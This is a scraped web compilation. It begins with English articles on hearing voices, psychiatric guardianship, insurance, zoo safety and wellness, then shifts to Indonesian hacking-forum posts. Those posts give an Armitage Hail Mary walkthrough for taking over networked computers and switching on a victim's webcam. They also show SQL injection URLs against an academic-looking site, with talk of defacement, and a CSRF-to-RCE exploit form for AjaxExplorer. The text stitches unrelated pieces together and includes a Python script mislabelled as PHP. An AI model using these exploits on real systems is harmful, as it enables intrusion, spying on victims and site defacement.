What Should You Know About Hearing Voices?

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Often people are amazed to know that some people hear voices in their heads as it is very uncommon. Hearing imaginary voices in your head can be very distressing as it would also affect the people around them. Those who wish to know more about hearing voices can refer to the resources following a psychiatric approach or find information through several other latest approaches. This would help people to manage those voices which can be bothersome. Generally, these voices in the head are referred to as auditory hallucinations which are not possible to ignore, suppress or deny. Earlier, many people believed that only those who suffered from schizophrenia only heard such voices. They also opined that such voices did not have any sense, was not understandable and hence they believed that nothing could be done about it, if their condition cannot be addressed by medications. In addition, there was a strong misconception that talking about the issue of hearing would make this condition much more worse. The main idea behind this traditional approach was to keep the voice hearers separate from the rest of the society.
Why is it important to have control?
For those of you who face the issue of hearing voices would agree that you should have good control over what you hear every time. Also, often such voices do make some sense as it would have some reflection upon the issues you face in your life. These days many people are aware of this condition and latest approaches help to cope up with the voices to help you have better control over it and to understand the voice while exerting control to prevent the voices from being disruptive in nature.
Who can hear voices?
Apart from people with schizophrenia, hearing voices is a common issue among people who are under some form of duress such as drug use, lack of sleep and sensory deprivation. It is actually an auditory hallucination that can be neutral, critical or complementary. These voices would often order an individual to perform some action or invite you for a conversation.
What should you do?
There are several ways to distract the voices and stay peaceful. Some methods are given below.
  1. Listen to other voice hearers: You can join a self help group and listen to what the other voice hearers share and learn more from them.

  2. Release the anxiety: When speaking with other voice hearers, you will be able to know that many are facing your situation. Plus, you will find about the tricks and tips for distracting the voices to enjoy a rewarding life. This way, your shame and anxiety levels remain low and would help you live a complete life.

  3. Seek explanation: Understanding the origin of these voices such as the factors triggering it and the reasons behind would help in the development of a coping strategy.
These ways would help you to accept that the voices belong to you and would help you have good control over it.
Hearing Voices Cymru offers a helping hand to voice hearers by motivating them to join peer support groups and self help groups of voice hearing people to discuss several experiences and arrive at helpful strategies to cope up with their conditions. It helps them by developing and suggesting many non medical methods to offer assistance for people hearing voices such as meeting other voice hearers who did not avail any psychiatric service to know better.

Legal Guardians & Inpatient Psychiatric Hospitals: 15 Tips for Collaborative Partnerships

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Individuals at some point in their lives may require inpatient psychiatric stabilization at a hospital. Admission can be voluntarily under the person's own volition, or admission may be involuntary if the person is unable to make the decision or unwilling. It is important that their guardian is part of their course of care from pre-admission through discharge. Effective treatment is imperative for psychiatric stabilization. A collaborative partnership between guardians and hospital treatment providers will help to facilitate an improvement in the individual's psychological functioning. Below are key tips for creating effective and collaborative partnerships.
1. Meet with staff immediately after admission to review admission paperwork.
2. Meet with staff as soon as possible to provide information related to current medications, and background information including medical, legal, psychiatric and inpatient histories.
3. Provide court documentation detailing the guardianship to the hospital for its records.
4. Ask questions regarding procedures, policies, patient rights, visitation hours etc.
5. Meet face to face with the Attending Psychiatrist, if he/she is unable then request a telephonic consultation so that you can discuss the treatment plan.
6. Read and educate yourself regarding your Ward's mental disorder(s) and their prescribed medications.
7. Visit your Ward at the hospital regularly and if you are unable then contact them via telephone.
8. Speak to Nurses on the unit daily to get a clinical report on psychiatric progress.
9. Attend the weekly treatment team meeting with your Ward to discuss course of treatment, clinical progress and aftercare plans.
10. Discuss with staff if there is a pending court hearing for the Ward if they are under an involuntary inpatient placement petition (if applicable).
11. Discuss with the Attending Psychiatrist/treatment team their recommendations for level of psychiatric care at discharge e.g. partial hospitalization, substance abuse, residential.
12. Keep the treatment team abreast of any changes that relate to housing placement prior to discharge.
13. Make sure you are advised of and give permission for any medication additions, deletions, or dosage changes.
14. Don't become intimidated by the process.
15. Advocate, advocate, advocate!!
The National Suicide Prevention Lifeline's 24 hour toll-free crisis hotline, 1-800-273-TALK or (1-800-273-8255)
TTY: 800-799-4889
National Alliance on Mental Illness
1-(800)-950-NAMI (6264)
National Institute of Mental Health
1-866-615-6464 (toll-free)
1-301-443-8431 (TTY)
1-866-415-8051 (TTY toll-free)
Substance Abuse and Mental Health Services Administration
877-SAMHSA-7 (877-726-4727)
800-487-4889 (TDD)
Dr. Sheffield is a Licensed Psychologist with extensive mental health experience particularly with ethnically diverse and socioeconomically disadvantaged populations. She has provided consultations for movies, organizations, mental health agencies and schools. Through her volunteerism as a Science Cheerleader, she along with 300+ other current and former NFL/NBA cheerleaders make appearances around the country to encourage girls and young women to pursue majors and careers in the STEM fields.
For more information please visit us at http://www.psychcorepa.com. Copyright © 2016, Felecia D. Sheffield, PhD. All Rights Reserved Worldwide in all Media.

Why You Might Need an Errors and Omissions Insurance Policy

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Making errors is just part of being human, either at workplace or in daily life activities. But there are certain clients who are pretty serious about every inch of their work. Even a slight mistake can make them claim for inadequate performance. These claims may seem small to the providing party, but can severely affect the financial position of a business and have the potential make them insolvent. In order to avoid such terrible consequences, companies get protection through an insurance policy and protect themselves from the consequences of claims.
Let's have a look at why companies need an errors and omissions policy.
What is an E & O Policy?
Before we move on to why companies get themselves insured under this policy, you must first understand the ins and outs of the policy. This kind of coverage is for the businesses who want to protect themselves from the expensive claims holding them responsible for the poor services. The claims are different from every client, they can be due to the failure to meet client's expectation of the services or may be due to not providing the services on time.
The insurance company is responsible to provide coverage for the losses incurred by the companies by defending and paying settlements or judgements. This policy helps put businesses in a secure position by knowing an unintentional error or mistake is not going to be catastrophic. Errors and omissions insurance policies is termed in different ways for every profession.
For instance, E & O policies are called 'malpractice insurance' for chiropractors, doctors, dentists. On the other hand, they are termed as 'professional liability' for engineers, lawyers, architects, and accountants. But the coverage is the same for all the professions. Technically, the errors and omissions insurance policy provides coverage against, settlements, judgments and defense costs.
Why Do You Need an E & O Policy?
We are neither a perfect as humans and business errors do take place. In fact mistakes do happen regardless of having the best team of employees and strategies for an organization. Being an employer, you never want to disappoint you're clients. But there is a possibility that an aggrieved client can file a law suit no matter if the claims are groundless or they can be resolved in person. Also, you can end up paying thousands of dollars and potentially bankrupt.
Furthermore, your credibility and reliability in the market and your target audience may decline. Employers who are providing services at a significant fee will need errors and omissions insurance protection. This coverage suits many business professionals, doctors, engineers, certified public accountants, wedding planners marketing managers, and individual business owners. You must keep in mind that the cost of this policy depends upon the business type, location and how many times the company has been involved in claims.
Remember to get insurance for errors and omission insurance policy from a veteran and credible insurance company to avoid obstacles down the line.

Commercial Insurance Claims at the Zoo

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Expert Author M Wyzanski
So the word is out: a child makes his or her way into the gorilla arena at the zoo; there is a ten minute interlude; the zoo decides to shoot the animal in order to protect the child. The result is one dead gorilla, one safe child, two grateful parents and scores of relieved but grieving zookeepers.
What follows next is something that can only be explained as sheer pandemonium! The public outrage and outcry is currently at a level that is rarely seen. Poor child? Poor parents? Poor zoo? Or poor gorilla?
If surface appearances mean anything at all, at the rate the comments are being posted everywhere on social media, the gorilla has actually been deemed the genuine liability victim with the most votes of sympathy.
This article is in no way about to conform to society's norms and vote any which way except to confirm that it sure is good that the institute of commercial and personal insurance is a vibrant force in today's business and personal world. Without doubt, insurance claims and lawsuits are about to follow, spurring more interest and debate about something that to many is a clear cut, open and shut case of cause and effect.
In general, brushing up on some tips at home before getting into your family car and driving off to the zoo is a very good idea.
• Never allow children to irritate the animals. Knocking at glass enclosure windows or bars, making fun of them in any way or doing anything that would cause them to become irritated can lead to the animal getting angry and behaving violently or dangerously.
• Never lift a child above safety guards that are installed in order to prohibit contact with caged animals. Unfortunately, doing so is only flirting with danger. Accidents do happen even though we would all wish them to vanish in thin air. And there have been cases where children have involuntary been dropped to face the ferocity of wild zoo animals.
• Keep an active eye on children at all times. Children will be children and wild animals will be wild animals. As the gorilla scenario clearly paints, no matter how impossible it appears, little ones can and do find a way to enter what may seem like an impossible entrance way and an all-too risky encounter.
• Train kids to ask for help from the right type of people in the event they find themselves astray in the zoo. Authorized zoo workers, police officers and women who are with other children are the safest type of people a lost child should go to for help. Parents should compensate for a small child's lack of your contact info knowledge by attaching a phone number prominently on clothing.
Notwithstanding the noisy commotion posted in the media coverage, a zoo can be the best place for a family to spend quality time with loved ones - not something to be taken lightly in life!
PRIME Insurance is an A++-rated agency that has won wide acclaim from the industry as well as from more than 10,000 satisfied customers nationwide. Presented with many prestigious awards and appointed to conduct direct business with over 40 of the leading companies, PRIME shops the broad network of providers to highlight tailored policies at competitively lowest quotes.
For all forms of coverage, including NJ cheap auto, low quote commercial umbrella, flood, renters, homeowners, bonds, workers comp, life insurance and more, PRIME can be reached at https://www.primeins.com, its email address: PRIME@primeins.com or by calling: 732-886-5751

6 Tips That Can Help You to Maintain Good Health

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Maintaining good health is easy at times, but more often than not, there is a chance that you will end up failing this process. This is because, maintenance of health requires an extremely good amount of care. There is no denying the fact that health is wealth and paying attention to your health means that you are bound for success. Thus some important tips have been briefly explained below.
1. Quit habits like smoking and drinking
Drinking and smoking are two common habits that can hinder your lifestyle and put your overall health at risk. Thus it is important that you avoid these habits and if you are a current smoker, make sure that you kick the butt as soon as possible. This will increase your life span also by a significant margin.
2. Get yourself checked up regularly
Always think of your doctor as he is your ally and he can keep you in good shape and health and not just any person who treats you when you are sick. Regular screenings and checkups are extremely vital especially if your family members or forefathers have a history of deadly diseases.
3. Watch your weight
Those extra pounds on your body can cause you a lot of trouble in the long run. Your heart will face a lot of strain and this can affect your overall health. Eat foods rich in fiber along with fruits and vegetables. Also reduce fat from your diet and this can take you a long way.
4. Avoid drinking in excess
Drinking moderate amounts of alcohol can be fine. On the other hand, heavy drinking can lead to serious issues with your liver and also other similar risks to your health. Make sure you get help if you are a heavy drinker.
5. Watch your back
Arthritis and bank injuries are a leading cause of physical disabilities. Hence you can reduce your chances of injury by losing a significant amount of weight. For this purpose, you must do a gentle amount of stretching before a rigorous workout. Also practice the sound techniques of weightlifting. It is one of the important things to remember.
6. Become safety conscious
Incidents that can cause a disability arise only when you are least expecting them. Thus, be conscious while you are driving, wear seat belts and drive slowly. While walking on the roads, always keep in mind that there are rash drivers around you.

Yoga for Mind and Body

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Expert Author Zainab Rangwala Vhora
It's no surprise that it's a very popular form of fitness and is fast catching up as the preferred exercise among people of all age groups. It has gradually gained a strong preference and it's almost becoming the 'cool' form of exercise. Practicing yoga offers you the chance to improve the overall wellbeing by not just improving your physical fitness, but helping and strengthening your mind as well. In today's fast paced world we all know how important it is to pay a little attention to our mental health as well.
Restful night sleep
As yoga focusses on the sequence of movements and breath, it helps in calming the mind and releasing muscle tension. It's an excellent way to beat the stress, feel relaxed and get restful sleep.
No more of the hunches
We are becoming increasingly screen-fixated with new gadgets for everything coming into our daily lives. On a regular day before we even realise, we would have already put in a couple of hours reading on our phones or laptops. This lifestyle leads to stiffness in the neck, back and makes us hunch over. By doing some of the specific yoga poses, that open your chest and shoulders up, can help in correcting and regaining your posture. Also, as your core gets stronger, it will directly lead to an improved posture too.
Beat the stress with the mat
Stress follows us everywhere, whether it's at work, school or home. Many studies have proven that yoga may help reduce stress and anxiety. As yoga practices, a mind-body approach and lays emphasis on controlled breathing it doesn't just relieve you of stress but also better prepares you to what you may perceive as stress. Just as you can correct your posture through yoga, you can rewire your mind and also prepare to deal with stressors.
Help in shedding those pounds
As beneficial as yoga may be, when it comes to fitness enthusiasts, there is a general belief that yoga is a no-sweat, calm exercise routine that is not vigorous enough to burn the stubborn fat down. However, a lot of recent studies and scientific research done in this area concludes that yoga does lead to actual weight loss. Yoga practitioners also strongly recommend this form of exercise as throughout the mind and body are in sync and this, in turn, leads to being more aware of what one is eating as well. Weight loss, as we know, is a combination of diet and exercise, hence, practicing yoga helps in managing and maintaining a healthy weight. Yoga also helps tone your muscles as a lot of the postures in yoga, use body weight form of exercise that work the muscles in a similar manner to push ups or crunches. Due to the improved muscle tone of your core, your bottom, legs, and arms, you'll experience less body pain as you age. The low-impact, stretching and slow movements you make during yoga practice are less straining than other types of exercise.
Finally, irrespective of one's age, if practiced on a regular basis, yoga can improve the overall health and well-being. You don't need pricey gym memberships, costly equipment, and the other frills. With just a simple mat and willingness, yoga can give you a whole new lease of life.


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Hari ini ane mau sharing sedikit pengetahuan ane tentang armitage.

Oke langsung aja deh ...

untuk menjalankan Armitage di Kali Linux. caranya mungkin beda sama yang tutor di google. Tapi sama saja sebenarnya tergantung kita sebagai user nya.

buka konsole ketik:

root@bt:~# msfgui > klik start new msfrpcd 

nanti keluar dialog box msfgui dan tunggu sebentar sampai loading nya selesai.......

Lalu pilih > file > show connections detail

nah nanti akan keluar dialog box baru lagi, jangan ditutup kita perlu pass nya untuk masuk ke armitage

sekarang buka konsole baru:
root@bt:~# armitage (atau dari menu juga bisa, terserah aja)

nah kalo semuanya berjalan dengan lancar tampilannya nanti begini:

oke, kita tinggal samain aja pass di connection detail ke armitage.
nah kalo udah tinggal klik connect

Kalo ga ada yang salah langkah2 nya Insya Allah berhasil, terus kalo sudah masuk ke armitage kita closed connection detail dan msfgui tapi jangan di stop
file > quit > No

Quote:Sekarang ane anggap udah pada masuk ke armitage.
kalo udah masuk armitage langsung aja pilih menu:

Hosts > Nmap > Quick scan (OS detect)
masukin Router Ip Contoh: 

tunggu sebentar sambil CoolCoolCool 
nanti akan muncul IP address yang lagi online beserta OS yang dipakai.
kalo berhasil nanti keluarnya begini....(gbr ane ambil dari tutor ane yg di forum sebelah)

oke, langsung aja mainkan hailmary nya.....

pilih menu > attacks > Hailmary > by port > Tunggu lagi deh.......hehehehe
kebanyakan nunggu yaa....mendingan sambil ngupi biar melek

Oiya, hail mary ini otomatis cari sendiri dia exploitnya...

untuk hasilnya kalo berhasil seperti ini:

IP berhasil dikuasai........heheheheh

selanjutnya terserah anda mau screenshoot atau aktifin webcam atau yang lain nya tinggal klik kanan komputer yg ada petirnya lalu pilih deh yang mau di explore....pokoknya lengkap lah.

kalo ane nyoba aktifin webcam korbn om...

Kalo berhasil mohon jangan di rusak komputer korban, dosa OM.....

Demikianlah sharing sedikit tentang Armitage > Hailmary..

Cara mengubah domain blogspot.co.id menjadi blogspot.com

Nah kali ini ane akan menjelaskan kenapa si domainnya blogspot.co.id?? kenapa ngga blogspot.com aja? Terus apa kelemahan domain blogspot.co.id??
Ini penjelasannya gan.. jadi tu blogger mengususkan wilayah indonesia saja yang bisa melihat karena disini kita menggunakan IP Indonesia..

Kelemahannya cuma bisa diliat di Indonesia. gabisa keluar negeri jadi kita makin terkenal di indonesia :v
Nih kali ini saya akan kasih script nih biar domain Blogspot.co.id menjadi Blogspot.com yang bisa diliat semua negara. Kan jadi mempermudah kita di Google Adsense (GA).

Nih scriptnya

Caranya agan masuk ke dashboard - tempate - edit html - Taruh di antara head dan body (contoh: </head> <body>


Okay kali ini mau ngebahas tentang SQL injection lagi tapi ini menggunakan ORDER BY 1000

jadi permasalahan nya pada SQL injection perintah order by nya di block, atau tidak menghasilkan

coba kita masukkan perinta :
target.ac.id/bid/utama.php?mod=detail&id=77 order by 100-- << tidak menampilkan unknow columns
coba kita tambah jadi target.ac.id/bid/utama.php?mod=detail&id=77 order by 1000-- << sama tidak menampilkan apa2

coba kita ganti perintah nya seperti ini
target.ac.id/bid/utama.php?mod=detail&id=77' order by 100-- -

hemm gk keluar apa2, malah blank :v
coba kecilin lg order by nya

wew pas di kecilin muncul lagi tulisan nya

berarti kita asumsikan ada 8 kolom
coba kita tes dan ternyata gk keluar angka ajaib nya

coba kita ganti perintah nya dg ini
target.ac.id/bid/utama.php?mod=detail&id=77' div 0 union select 1,2,3,4,5,6,7,8-- -

dan tarraaa keluar angka ajaib nya
selanjut nya sama seperti syntax sqli biasa nya

udah gitu aja, semoga bermanfaat

nah ane selalu mentok disini nih kalo belajar sql injection Big Grin jadinya gak pernah bisa nge-deface wkwk
ane mau nanya om, dasar sih sebenernya, untuk dapet target webnya itu pakek apa? google dork gitu ya om ?


Menanam saham harus segera dilakukan sejak dini, agar nanti saat sudah semakin tua tidak terasa saham yang kita miliki semakin banyak. Namun jangan lupa, juga utk melakukan pendataan yang baik pada saham kita sendiri, takut lupa... kalo takut nyimpen saham sendirian, baik2 boleh share sama saya... pasti dijaga baik2... hehehhe...

kenapa saya membuat judul menanam saham?? yaitu tadi karena menanam saham baik dilakukan sejak dini.

lalu apa itu AjaxExplorer? AjaxExplorer kalo saya bilang itu sama kaya tampilan folder dalam windows xp, cuman kemasannya dalam suatu website... gimana yah jelasinnya.. coba liat skrinsut dibawah

kaya gini:

naahh kaya gitu, trus kenapa menanam saham di AjaxExplorer? dalam cerita2 korban papa minta saham seperti di tipi2... hhehhehee,,,, di AjaxExplorer ini membuat saham tidak sesulit saat papa minta saham...

naahh langsung aja kita coba simulasinya di localhost masing2... mohon maaf jika ada kekurangan, karena niatnya cuman saling belajar menanam saham utk masa depan bangsa dan keluarga sekalian.

pertama saya buat download file nya di https://sourceforge.net/projects/ajax-explorer/files/

truss extract, kemudian copas folder yg di extract td "AjaxExplorer" di xampp/htdocs

lalu install > > > > >

kalo udah di install

sekarang waktunya utk mencoba serangan RCE (Remote Code Execution)

buat direktori baru di htdocs, anggep aja ceritanya beda serper... jadi nanti targetnya http://localhost/AjaxExplorer%

dan si attacker atau penanam saham (yaitu elu) menggunakan http://localhost/attacker

trus, buat file baru misalnya index.php dalam folder C:\xampp\htdocs\attacker

<iframe name="DOOM" style="display:none" name="hidden-form"></iframe>
<form target="DOOM" id="CSRF2" method="post" action="
<input type="hidden" name="strPage" value="control/file/editor" />
<input type="hidden" name="strPath" value="D:/" />
<input type="hidden" name="strFile" value="hehehe.php" />
<input type="hidden" name="strText"
value="<?php echo'Saya menanam saham disini, jadi tolong jaga baik-baik anak kita. Jangan sampai masa dpan dia suram!! Apa lagi jadi Homo atau Hode utk naklukin siberking sama krucut di game onlen';?>" />
<form target="DOOM" id="CSRF1" method="post" action="
<input type="hidden" name="strPage" value="control/file/create" />
<input type="hidden" name="strPath" value="D:/" />
<input type="hidden" name="strFile" value="D:/hehehe.php" />

Untuk memastikan kalau saham berhasil dimasukkan, mari kita pastikan dlu kalau folder C:\xampp\htdocs\AjaxExplorer hanya berisi folder ajaxexplorer atau coba akses http://localhost/AjaxExplorer%, kalau object not found berarti belum ada. Karena pada 
AjaxExplorer akan kita tanam file hehehe.php


kalo udah, sekarang coba akses http://localhost/attacker menggunakan browser kesayangan

naahhh, sekarang coba periksa kembali, apakah folder yg tadinya kosong ada isinya??

coba akses http://localhost/AjaxExplorer%



Sekian dari saya, terimakasih

diterapkan dari sumber: https://www.exploit-db.com/exploits/39876/

Download Subtitle Youtube

Hi Guys ! Kali ini gua mau share Script buat download Subtitle di youtube loh , jadi gak perlu nyari jauh2 subtitle nya, tinggal pakai ini aja


ane baru belajar python bro. mohon dikoreksi script nya agar bisa menjadi lebih effisien ..


Ok Guys ! Kali ini mau nyoba untuk memeriksa jumlah email yang belum dibaca di akun IMAP, saya membuat sebuah sript Python. Tapi karena saya tidak ingin query server setiap detik, aku caching nilai dalam file dan update setiap 30 detik. Buat cronjob atau mirip dengan memperbarui file.

#!/usr/bin/env python

import imaplib

obj = imaplib.IMAP4_SSL('xxx.xxx.xxx.xxx', '993')
obj.login('user', 'password')
print len(obj.search(None, 'UnSeen')[1][0].split())

Save di notepad dengan Ekstensi ".php" tanpa tanda "
Selesai , tinggal jalankan saja programnyaOriginally posted on my blog